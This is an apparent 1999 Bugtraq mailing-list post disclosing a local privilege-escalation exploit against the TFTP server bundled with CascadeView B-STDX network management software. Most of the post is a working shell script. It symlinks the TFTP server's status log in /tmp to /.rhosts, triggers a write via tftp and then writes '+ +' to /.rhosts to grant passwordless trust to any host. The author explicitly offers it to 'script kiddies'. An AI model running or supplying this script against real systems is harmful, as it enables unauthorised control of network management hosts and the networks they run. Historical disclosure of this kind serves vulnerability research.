Date: Fri, 31 Dec 1999 08:48:25 -0800
From: Loneguard <loneguard@CRAZYMONKEY.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: tftpserv.sh
CascadeView is an network management system that ships with an
exploitable TFTP server. Incase anyone misses the significance
of this, you control the NMS you control the network :) Here's
a local exploit to tied the script kiddies over...
#!/bin/sh
#
# tftpserv.sh - Loneguard 07/03/99
#
# Buggy tftp server shipped with CascadeView B-STDX 8000/9000
#
rm /tmp/tftpd_xfer_status.log
ln -s /.rhosts /tmp/tftpd_xfer_status.log
echo KungFu > crazymonkey
( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1
echo "+ +" > /.rhosts